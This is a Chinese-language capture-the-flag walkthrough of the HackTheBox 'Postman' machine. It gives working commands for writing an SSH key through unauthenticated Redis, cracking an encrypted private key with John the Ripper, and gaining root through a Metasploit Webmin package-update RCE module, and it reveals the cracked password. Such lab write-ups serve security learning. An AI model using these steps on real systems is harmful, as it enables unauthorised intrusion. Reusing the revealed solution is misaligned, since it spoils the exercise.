基本信息

端口扫描

需要全端口扫描,22,80,6379,10000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nmap -p- -sC -sV 10.10.10.160

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

redis未授权

redis未授权,就是常规的写ssh公钥,redis默认路径:

1
2
3
4
5
6
7
8
9
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > id_rsa-key.txt
cat id_rsa-key.txt | redis-cli -h 10.10.10.160 -x set miao

# redis
get miao
config set dir /var/lib/redis/.ssh
config set dbfilename authorized_keys
save
exit

然后以redis用户ssh登录:

信息搜集

opt目录下有个id_rsa.bak,是一个加密的ssh私钥:

john crack

1
2
3
4
python /usr/share/john/ssh2john.py id_rsa.bak > hash.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

computer2008

user flag

不能直接使用私钥登录,但破解出来的密码就是Matt用户密码,可以切换过去在用户目录得到user.txt:

Webmin

回到10000端口,直接访问提示需要用域名,加hosts:

1
10.10.10.160 Postman

访问是一个webmin:

用户名密码就是:

1
Matt : computer2008

exploit

1.910版本的webmin,存在已知漏洞,msf里也有模块,注意需要ssl设置为true:

1
2
3
use linux/http/webmin_packageup_rce

set SSL true

root flag

打到root shell,得到root.txt:

参考资料